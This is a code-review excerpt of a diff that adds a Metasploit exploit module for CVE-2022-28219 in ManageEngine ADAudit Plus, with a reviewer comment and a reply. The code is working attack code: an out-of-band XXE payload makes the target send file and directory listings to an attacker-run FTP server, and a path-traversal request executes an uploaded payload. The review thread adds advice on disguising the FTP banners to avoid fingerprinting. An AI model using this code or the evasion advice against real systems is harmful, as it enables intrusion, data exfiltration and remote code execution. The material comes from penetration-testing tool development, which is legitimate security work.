modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb

```diff
@@ -0,0 +1,365 @@
+      end
+
+      # If multiple payloads appeared, abort for safety
+      if possible_payloads.length > 1
+        fail_with(Failure::UnexpectedReply, "Found #{possible_payloads.length} apparent payloads in temp folders - aborting!")
+      end
+
+      # Execute the one payload
+      payload_path = possible_payloads.pop
+      print_status("Executing payload: #{payload_path}...")
+
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => "#{datastore['TARGETURI_DESERIALIZATION']}?img=/../../../../../../../../../../../../../#{payload_path}"
+      )
+
+      if res.code != 200
+        fail_with(Failure::Unknown, "Path traversal request failed with HTTP/#{res.code}")
+      end
+    ensure
+      # Kill the upload thread
+      if t
+        begin
+          t.kill
+        rescue StandardError
+          # Do nothing if we fail to kill the thread
+        end
+      end
+    end
+  end
+
+  def get_directory_listing(folder)
+    # Generate a unique callback URL
+    path = "/#{rand_text_alpha(rand(8..15))}.dtd"
+    full_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{path}"
+
+    # Start a HTTP server that will cause the FTP connection
+    serve_http_file(path, "<!ENTITY % all \"<!ENTITY send SYSTEM 'ftp://#{srv_host}:#{datastore['SRVPORT_FTP']}/%file;'>\"> %all;")
+
+    # Start a server to handle the reverse FTP connection
+    ftp_server = Rex::Socket::TcpServer.create(
+      'LocalPort' => datastore['SRVPORT_FTP'],
+      'LocalHost' => datastore['SRVHOST'],
+      'Context' => {
+        'Msf' => framework,
+        'MsfExploit' => self
+      }
+    )
+
+    # Trigger the XXE to get file listings
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI_XXE']).to_s,
+      'ctype' => 'application/json',
+      'data' => encode_xml("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % file SYSTEM \"file:#{folder}\"><!ENTITY % dtd SYSTEM \"#{full_url}\"> %dtd;]><data>&send;</data>")
+    )
+
+    if res.code != 200
+      fail_with(Failure::Unknown, "XXE request to get directory listing failed with HTTP/#{res.code}")
+    end
+
+    # Accept an FTP session, and wait a short amount of time for data to come in
+    ftp_client = nil
+    ftp_data = ''
+    begin
+      # We don't have a good way to tell when the data is fully received, so
+      # wait for a short amount of time
+      Timeout.timeout(2) do # Be careful changing this timeout - this needs to run several times, potentially
+        ftp_client = ftp_server.accept
+
+        # Just enough FTP protocol to get what we need
+        ftp_client.print("200 hello I'm FTP\n")
+        ftp_client.print("331 password please\n")
+
+        # This technically sends too many requests for data, but that doesn't change anything
+        loop do
+          ftp_client.print("230 send data plz\n")
```

Comment:
In general as part of module reviews we suggest folk swap out hard-coded strings like this to something more either random, or more generic to help mitigate fingerprinting, i.e. prefer to copy the banners of existing ftp software etc.

I'm not sure what our default ftp server does out of the box, but potentially that's worth a check

Reply:
I found a public server and mimicked that as best as possible